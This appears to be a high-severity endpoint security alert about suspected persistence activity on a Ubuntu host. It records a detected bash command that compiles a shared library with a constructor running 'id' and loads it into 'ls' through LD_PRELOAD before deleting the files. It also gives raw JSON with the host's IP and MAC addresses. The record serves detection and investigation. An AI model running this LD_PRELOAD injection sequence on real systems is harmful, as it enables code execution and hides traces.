Alert Information High
Alert ID
ind:f04562e41eb24f95911339a2dfa4d617:1766236107127442660-30106-3940368
Composite ID
84393bf974fd44bda943a25a6a7bc27f:ind:f04562e41eb24f95911339a2dfa4d617:1766236107127442660-30106-3940368
Description
The activity appears to be related to an adversary establishing persistence. The host may already be compromised and the activity should be investigated further to find the source.
Host
inbridge-40
Status
new
Created Time
2025-12-20 22:09:29
Updated Time
2025-12-20 23:08:29
MITRE ATT&CK
Tactic
Persistence
Technique
External Remote Services
Command Line
bash -c cat > /tmp/e.c << "E"
#include <stdlib.h>
void __attribute__((constructor)) i() { system("id"); }
E
gcc -shared -fPIC -o /tmp/e.so /tmp/e.c 2>/dev/null
LD_PRELOAD=/tmp/e.so ls 2>/dev/null
rm -f /tmp/e.c /tmp/e.so
Raw JSON Data
{"id":"ind:f04562e41eb24f95911339a2dfa4d617:1766236107127442660-30106-3940368","composite_id":"84393bf974fd44bda943a25a6a7bc27f:ind:f04562e41eb24f95911339a2dfa4d617:1766236107127442660-30106-3940368","agent_id":"f04562e41eb24f95911339a2dfa4d617","cid":"84393bf974fd44bda943a25a6a7bc27f","description":"The activity appears to be related to an adversary establishing persistence. The host may already be compromised and the activity should be investigated further to find the source.","severity":70,"severity_name":"High","confidence":80,"tactic":"Persistence","tactic_id":"TA0003","technique":"External Remote Services","technique_id":"T1133","cmdline":"bash -c cat \u003E /tmp/e.c \u003C\u003C \u0022E\u0022\n#include \u003Cstdlib.h\u003E\nvoid __attribute__((constructor)) i() { system(\u0022id\u0022); }\nE\ngcc -shared -fPIC -o /tmp/e.so /tmp/e.c 2\u003E/dev/null\nLD_PRELOAD=/tmp/e.so ls 2\u003E/dev/null\nrm -f /tmp/e.c /tmp/e.so","filename":"bash","filepath":"/usr/bin/bash","sha256":"bc5945feb8bd26203ebfafea5ce1878bb2e32cb8fb50ab7ae395cfb1e1aaaef1","status":"new","type":"ldt","created_timestamp":"2025-12-20T13:09:29.455325708Z","updated_timestamp":"2025-12-20T14:08:29.23541463Z","device":{"device_id":"f04562e41eb24f95911339a2dfa4d617","cid":"84393bf974fd44bda943a25a6a7bc27f","agent_version":"7.31.18410.0","hostname":"inbridge-40","local_ip":"10.24.11.214","external_ip":"211.198.135.5","mac_address":"00-0c-29-31-3f-de","platform_name":"Linux","os_version":"Ubuntu 24.04"},"aggregate_id":"aggind:f04562e41eb24f95911339a2dfa4d617:12930907065","CreatedAt":"2025-12-20T22:09:29.4553257+09:00","UpdatedAt":"2025-12-20T23:08:29.2354146+09:00"}
Quick Info
  • Severity High
  • Score 70
  • Agent ID f04562e41eb24f95911339a2dfa4d617